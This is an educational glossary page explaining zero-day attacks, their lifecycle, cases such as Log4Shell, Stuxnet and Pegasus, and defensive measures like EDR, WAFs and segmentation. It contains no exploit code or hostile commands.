Cyber Threats & Countermeasures

Zero-Day Attack

About 4 min read

Last updated: 2026-01-22

What Is a Zero-Day Attack

A zero-day attack exploits a software vulnerability during the window between its discovery and the release of a patch (fix) by the developer - the "zero days" of available defense. Since no patch exists, traditional patch-based defenses are ineffective.

Zero-day vulnerabilities are traded on the black market for high prices - an iOS remote code execution vulnerability can fetch millions of dollars. Nation-state actors and advanced persistent threat (APT) groups stockpile zero-day exploits for intelligence operations and cyberwarfare.

The Zero-Day Attack Lifecycle

  1. Vulnerability Discovery: An attacker (or security researcher) discovers an unknown vulnerability in software.
  2. Exploit Development: Code that exploits the vulnerability (an exploit) is created.
  3. Attack Execution: The exploit is used to attack the target. At this point, no patch exists, and signature-based antivirus cannot detect it.
  4. Vulnerability Disclosure: The vulnerability is reported to the developer or publicly disclosed. The developer begins working on a patch.
  5. Patch Release: The developer releases a fix. Users who apply the patch are protected, but unpatched systems remain vulnerable.

The critical danger period is between steps 3 and 5. The longer this window, the greater the damage. Responsible disclosure practices aim to minimize this window by coordinating with developers before public disclosure.

Real-World Cases

  • Log4Shell (2021): A vulnerability discovered in the Java logging library Log4j (CVE-2021-44228). It affected hundreds of millions of servers worldwide, and large-scale attacks began within 24 hours of disclosure. The depth of supply chain dependencies amplified the damage.
  • Stuxnet (2010): Malware that exploited multiple Windows zero-day vulnerabilities to sabotage Iran's nuclear centrifuges. Believed to be a joint US-Israeli operation, it demonstrated that cyberattacks could cause physical destruction of infrastructure.
  • Pegasus (NSO Group): Spyware that exploited iOS and Android zero-day vulnerabilities to infect smartphones without any user interaction (zero-click). Used for surveillance of journalists and human rights activists, raising serious human rights concerns.

Defense Strategies Against Zero-Day Attacks

Against attacks where no patch exists, a defense-in-depth approach is essential.

  • WAF Deployment: Web Application Firewalls can detect and block not only known attack patterns but also anomalous request patterns. They can mitigate some zero-day attacks.
  • EDR (Endpoint Detection and Response): Unlike traditional antivirus that relies on signatures, EDR detects suspicious behavior (unusual process execution, mass file access) and can automatically isolate affected endpoints.
  • Network Segmentation: Dividing the network into segments limits the blast radius even if one segment is compromised. Isolating critical systems is especially important.
  • Principle of Least Privilege: Granting users and applications only the minimum necessary permissions limits the damage an attacker can do even after exploiting a vulnerability.
  • Threat Intelligence: Subscribing to threat intelligence feeds to stay informed about newly discovered vulnerabilities and attack trends enables proactive defense measures.

To learn more about this topic, see Supply Chain Attacks: The New Threat Exploiting Trust.

Common Misconceptions

Zero-day attacks are irrelevant to ordinary users
When zero-day vulnerabilities exist in browsers or operating systems, regular users are also affected. Vulnerabilities in widely used libraries like Log4Shell can indirectly impact users through the services they use.
Antivirus software can prevent zero-day attacks
Traditional antivirus software detects threats based on signatures (patterns of known malware) and cannot handle unknown attacks. Next-generation EDR with behavioral detection and sandboxing capabilities is needed.
Share

Related Terms

Vulnerability Management The continuous, cyclical process of discovering, assessing, prioritizing, and re… WAF (Web Application Firewall) A security solution that monitors, filters, and blocks malicious HTTP/HTTPS traf… Supply Chain Attack An attack that infiltrates the software development, build, or distribution pipe… Penetration Testing A proactive security assessment method where authorized security professionals s… Incident Response A systematic, structured process for detecting, containing, eradicating, and rec… Server A computer or software that provides services and data to other computers (clien…

Related Articles

Supply Chain Attacks: The New Threat Exploiting Trust Understand how software supply chain attacks work, real-world examples, and defense strategies for i… Ransomware Protection Guide: Defending Against Extortion Attacks A comprehensive guide to understanding ransomware, its infection vectors, prevention strategies, and… Why Updates Are Annoying but Necessary - The Real Danger of Clicking 'Later' Learn about the importance of security patches, how zero-day exploits work, the WannaCry (230,000 de…
← Glossary